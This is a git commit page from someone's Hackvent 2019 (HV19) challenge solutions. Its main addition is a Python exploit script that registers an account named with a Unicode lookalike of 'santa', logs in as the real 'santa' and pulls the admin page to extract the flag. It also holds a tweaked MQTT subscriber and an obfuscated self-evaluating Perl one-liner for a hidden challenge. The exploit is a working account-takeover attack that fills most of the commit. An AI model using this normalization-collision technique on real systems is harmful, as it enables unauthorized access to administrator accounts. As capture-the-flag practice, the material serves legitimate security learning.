Day17 code
Dieser Commit ist enthalten in:
Ursprung
7926b309e2
Commit
5267a8d008
@ -7,7 +7,7 @@ import logging
|
||||
|
||||
def on_connect(client, userdata, flags, rc):
|
||||
if rc == 0:
|
||||
path = 'HV19/#';
|
||||
path = 'HV19/gifts/#';
|
||||
client.subscribe(path, qos=0)
|
||||
|
||||
def on_message(client, userdata, msg):
|
||||
|
33
Day 17/exploit.py
Normale Datei
33
Day 17/exploit.py
Normale Datei
@ -0,0 +1,33 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
import requests
|
||||
import random
|
||||
import string
|
||||
import re
|
||||
|
||||
BASE_URL = "http://whale.hacking-lab.com:8881"
|
||||
PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
|
||||
SESSION = requests.session()
|
||||
FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
|
||||
|
||||
# 1. register user santa
|
||||
res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
|
||||
if res.status_code != 200 or "Registration successful!" not in res.text:
|
||||
print("Server returned: %d %s" % (res.status_code, res.status_text))
|
||||
print(res.text)
|
||||
exit(1)
|
||||
|
||||
# 2. login
|
||||
res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
|
||||
if res.status_code != 200 or "username not found or wrong password!" in res.text:
|
||||
print("Server returned: %d %s" % (res.status_code, res.status_text))
|
||||
print(res.text)
|
||||
exit(1)
|
||||
|
||||
# 3. get flag
|
||||
res = SESSION.get(BASE_URL + "/admin.php")
|
||||
if res.status_code != 200 or "username not found or wrong password!" in res.text:
|
||||
print("Server returned: %d %s" % (res.status_code, res.status_text))
|
||||
exit(1)
|
||||
|
||||
print(FLAG_PATTERN.search(res.text))
|
5
Day 17/source.phps
Normale Datei
5
Day 17/source.phps
Normale Datei
Dateidiff unterdrückt, weil mindestens eine Zeile zu lang ist
1
Hidden 04/input.pl
Normale Datei
1
Hidden 04/input.pl
Normale Datei
@ -0,0 +1 @@
|
||||
s@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\x20\n^&&s[(.)(..)][\2\1]g;s%4(...)%"p$1t"%ee
|
Laden…
In neuem Issue referenzieren
Einen Benutzer sperren